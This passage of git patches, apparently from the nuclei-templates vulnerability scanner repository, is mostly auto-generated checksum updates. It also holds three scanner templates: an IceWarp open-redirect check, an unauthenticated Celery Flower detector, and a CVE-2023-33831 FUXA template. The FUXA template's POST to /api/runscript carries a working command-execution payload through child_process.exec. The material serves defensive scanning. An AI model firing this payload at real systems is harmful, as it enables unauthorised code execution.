-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
-http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
+http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
-http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7206,7 +7206,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:895d3dd994a3f786450c261eb7b7a7565c3e3cb5
+templates-checksum.txt:d90687e94a9aa7fcb1f9d54a2a6ee96e2eba7d97
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 763b2e702d3e8bd9fe8ea386de8be251efb9ed69 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 1 Oct 2023 17:53:02 +0530
Subject: [PATCH 0635/1090] Update icewarp-open-redirect.yaml

---
 http/vulnerabilities/other/icewarp-open-redirect.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/http/vulnerabilities/other/icewarp-open-redirect.yaml b/http/vulnerabilities/other/icewarp-open-redirect.yaml
index 3506184ccd..999d93e6ac 100644
--- a/http/vulnerabilities/other/icewarp-open-redirect.yaml
+++ b/http/vulnerabilities/other/icewarp-open-redirect.yaml
@@ -17,9 +17,9 @@ info:
   tags: icewarp,redirect
 
 http:
-  - raw:
-      - |
-        GET ///interact.sh/%2F.. HTTP/1.1
+  - method: GET
+    path:
+      - "{{BaseURL}}///interact.sh/%2F.."
 
     matchers-condition: and
     matchers:

From bee8471fc7793fd5c59d25144d7d2b410a6dabe9 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 12:26:21 +0000
Subject: [PATCH 0637/1090] Auto Generated Templates Checksum [Sun Oct  1
 12:26:21 UTC 2023] :robot:

---
 templates-checksum.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index e1ce6e297d..90c20d6f9b 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -6578,7 +6578,7 @@ http/vulnerabilities/other/huawei-hg659-lfi.yaml:153ac378223f36a765f5c11859f9686
 http/vulnerabilities/other/huawei-router-auth-bypass.yaml:02e9cdbfe7a617cc9bd386b768c9cb87cb307828
 http/vulnerabilities/other/huijietong-cloud-fileread.yaml:8837f0510adff944c21b7a8bd834d8fb26b324d9
 http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml:85af2d6b7d3ad44c81486bd32525c591071a5cb8
-http/vulnerabilities/other/icewarp-open-redirect.yaml:3c0950d121344dce646aa7c44e5cf26797cf57d1
+http/vulnerabilities/other/icewarp-open-redirect.yaml:8b97e128ef59d903dc7c688a1dbb851b9856f293
 http/vulnerabilities/other/icewarp-webclient-rce.yaml:a6173da20141f99f9999e920929bb6427b3f710d
 http/vulnerabilities/other/inspur-clusterengine-rce.yaml:6a41c5362bd90bcc2c274d23d09b830b4fea7ff8
 http/vulnerabilities/other/interlib-fileread.yaml:9317c432701aa30efec7a236b30f62d321fda237
@@ -7206,7 +7206,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:d90687e94a9aa7fcb1f9d54a2a6ee96e2eba7d97
+templates-checksum.txt:6fa9152640ec641decaf368f20f140a35d2d220f
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From a151696a50000e429907aaa8c5177e4d898f9424 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Sun, 1 Oct 2023 18:12:23 +0530
Subject: [PATCH 0638/1090] Create unauth-celery-flower.yaml

---
 .../unauth-celery-flower.yaml                 | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/misconfiguration/unauth-celery-flower.yaml

diff --git a/http/misconfiguration/unauth-celery-flower.yaml b/http/misconfiguration/unauth-celery-flower.yaml
new file mode 100644
index 0000000000..390cf5b115
--- /dev/null
+++ b/http/misconfiguration/unauth-celery-flower.yaml
@@ -0,0 +1,29 @@
+id: unauth-celery-flower
+
+info:
+  name: Celery Flower - Unauthenticated Access
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    Celery Flower was able to be accessed with no authentication requirements in place.
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:-374133142
+  tags: celery,flower,unauth,misconfig
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dashboard'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Dashboard'
+          - 'Tasks'
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 06674c9bcae4f4f14c42ba18ea7c368d98b1b3da Mon Sep 17 00:00:00 2001
From: GwanYeong Kim 
Date: Mon, 2 Oct 2023 01:19:18 +0900
Subject: [PATCH 0639/1090] Create CVE-2023-33831.yaml

A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.

Signed-off-by: GwanYeong Kim 
---
 http/cves/2023/CVE-2023-33831.yaml | 47 ++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-33831.yaml

diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml
new file mode 100644
index 0000000000..11c573f6fb
--- /dev/null
+++ b/http/cves/2023/CVE-2023-33831.yaml
@@ -0,0 +1,47 @@
+id: CVE-2023-33831
+
+info:
+  name: FUXA - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: |
+    A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-33831
+    - https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-33831
+    cwe-id: CWE-77
+    epss-score: 0.003140000
+    epss-percentile: 0.667090000
+    cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
+  tags: cve,cve2023,rce,frangoteam,fuxa,unauth
+
+http:
+  - raw:
+      - |
+        POST /api/runscript HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{randstr}}')"}}}
+
+      - |
+        GET /_images/{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'uid'
+          - 'gid'
+          - 'groups'
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 29d3f2c5ce843d24b04427b0d3881356f7e0736c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 18:46:35 +0000
Subject: [PATCH 0641/1090] Auto Generated Templates Checksum [Sun Oct  1
 18:46:35 UTC 2023] :robot:

---
 templates-checksum.txt | 26 +++++++++++++-------------
 1 file changed, 13 insertions(+), 13 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 90c20d6f9b..dc58bb5883 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -10,22 +10,22 @@ TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
 cves.json:d1b620a4ffdff4357f8ac0f6c2851432b383d21d
 cves.json-checksum.txt:01b01701e0b0067c448bd00ab0c5b57c4e3d3e0a
-dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
-dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
-dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
-dns/dmarc-detect.yaml:d6d23a8837c5ec3809ffa2d407a72fdc7a071671
-dns/dns-saas-service-detection.yaml:b8e5a37cc3e5fcdeb3ec3a742b8bc81babf5c302
-dns/dns-waf-detect.yaml:f4d80afe7d48cee91123294482cd63cadeaa943d
-dns/dnssec-detection.yaml:6dd2e7d114f3be862e2f1e87f5d2d2c4de1bf08a
+dns/azure-takeover-detection.yaml:863092131887fda59ffa931f1cdb185d5d610673
+dns/caa-fingerprint.yaml:bd63e30ae58fa54cf17dbd0e6fe0f7ba714910cf
+dns/detect-dangling-cname.yaml:795590491e125f03f96b9639414380ef847a386e
+dns/dmarc-detect.yaml:f61a2d91c57062d8cdd4d404e039c195d0d00e88
+dns/dns-saas-service-detection.yaml:0ab7526178e67855d4a5bcc726e987175c371f8b
+dns/dns-waf-detect.yaml:3125ea6967b8d5a1df4dc6105c43ad218f2eea9b
+dns/dnssec-detection.yaml:a79fec9246a48867a88196bb39a614ff929cf3f8
 dns/ec2-detection.yaml:01823f3399c471516137b067f37f5c6661ae3099
-dns/elasticbeanstalk-takeover.yaml:429b92a11cdfe0efb1f5483d886de33574ff3842
-dns/mx-fingerprint.yaml:191e425d8cad1d504d8f7ca3b19914cfd77ebb7b
+dns/elasticbeanstalk-takeover.yaml:ae529895d08036d6efebc51797189be143969caf
+dns/mx-fingerprint.yaml:6adecb148a658c00d547b491a98da4da109a932f
 dns/mx-service-detector.yaml:30d6bf3fec86d54f93a83438afe8595aff572212
-dns/nameserver-fingerprint.yaml:73093f4b321ce7b50e4f1cd0b16b037beb85b008
-dns/ptr-fingerprint.yaml:8a0953acfeb9384460c4f3ac0b463a0b42370529
+dns/nameserver-fingerprint.yaml:c70e2c34eab51eae1744ff710757c35dbd14feb1
+dns/ptr-fingerprint.yaml:f0705abb85adda98a446c5068d15254fc0d38e1f
 dns/servfail-refused-hosts.yaml:28e8b71907bbf6bb931e051696cd1c0a5adc3199
 dns/spoofable-spf-records-ptr.yaml:09cc066be755115a6cf01a5c810c55bf896f34e1
-dns/txt-fingerprint.yaml:23a6fa89c5e01dbe3d002b155924cfd87407b933
+dns/txt-fingerprint.yaml:c9753884387da1960c0cb44474042d26aaf9157e
 dns/worksites-detection.yaml:b257c6733a9668de61c96e2e49f587c40ec84ed3
 file/android/adb-backup-enabled.yaml:735fd5eb61df164d28eabae76048be9487fb2443
 file/android/biometric-detect.yaml:70f5e2dda35223782c5fbab51b93f620605201b0
@@ -7206,7 +7206,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
